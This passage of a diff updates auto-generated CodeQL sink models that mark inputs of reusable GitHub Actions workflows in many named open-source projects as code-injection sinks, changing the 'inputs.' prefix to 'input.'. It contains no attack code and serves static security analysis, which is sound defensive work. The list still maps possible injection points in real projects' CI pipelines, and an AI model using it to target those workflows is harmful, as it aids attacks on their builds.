["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index c07d2aba0b6c..6185f9d03d05 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 77a7eaae309f..273bbc695405 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 09299774b6a6..3aac3af3cae6 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -3,27 +3,27 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] - - 
["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", 
"input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", 
"input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 028210d4eac9..9887b8e5f3ae 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 2ea83d9d94b9..4c6379fd94b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", 
"code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 69f1b740c968..35738fe6c0f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 61af1d324413..77db768cf32e 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 1532fc723aa9..509de9546464 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", 
"input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index f4a7cd26183d..6e0e2865e83c 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 119bfeaa7969..175012c10c94 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 10ea343b7aab..84a834d9a1f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 6310b7155d32..2946a78cf835 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index a1de7e9a8f93..7ce68d84ca5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", 
"input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index d6e334573e4b..8e3b9ccc0f8a 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index eeff97a8aeac..f41e2ee12461 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] - - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 34ffd6788b13..c643a6a9fe06 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 8ee00d47f799..9aad213b1dfe 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 40b35b5c8732..1906ef45379e 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] - - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index c02368b5d51f..f5ce50243f7c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -3,5 +3,5 @@ extensions: pack: 